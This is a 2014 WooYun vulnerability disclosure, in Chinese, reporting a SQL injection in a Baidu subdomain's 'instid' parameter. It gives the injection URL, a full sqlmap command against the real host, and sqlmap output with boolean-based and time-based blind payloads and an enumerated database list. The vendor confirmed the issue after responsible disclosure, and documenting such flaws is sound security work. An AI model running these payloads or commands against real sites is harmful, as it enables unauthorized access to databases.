当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082625

漏洞标题:百度某分站SQL注射

相关厂商:百度

漏洞作者: kobin97

提交时间:2014-11-09 11:48

修复时间:2014-12-24 11:50

公开时间:2014-12-24 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-09: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-20: 细节向核心白帽子及相关领域专家公开
2014-11-30: 细节向普通白帽子公开
2014-12-10: 细节向实习白帽子公开
2014-12-24: 细节向公众公开

简要描述:

百度某分站SQL注射

详细说明:

http://guang.baidu.com/g/getinst?intPage=0&instid=5%27%20order%20by%201%20limit%200,1%23
instid 存在注入,要登陆

漏洞证明:

python sqlmap.py -u "http://guang.baidu.com/g/getinst?intPage=0&instid=5" -p instid --prefix "'" --suffix "limit 0,1#" --string "v2ex.com"  --dbms=mysql --cookie "cookie" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:06:06
[22:06:11] [INFO] testing connection to the target URL
[22:06:12] [INFO] testing if the provided string is within the target URL page content
[22:06:12] [WARNING] you provided 'v2ex.com' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: instid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: intPage=0&instid=5' AND 7341=7341 limit 0,1#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: intPage=0&instid=5' AND SLEEP(5) limit 0,1#
---


available databases [5]:
[*] Dr*****
[*] Dr*****
[*] Dr*****
[*] Dr*****
[*] information_schema


修复方案:

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-11-10 10:29

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无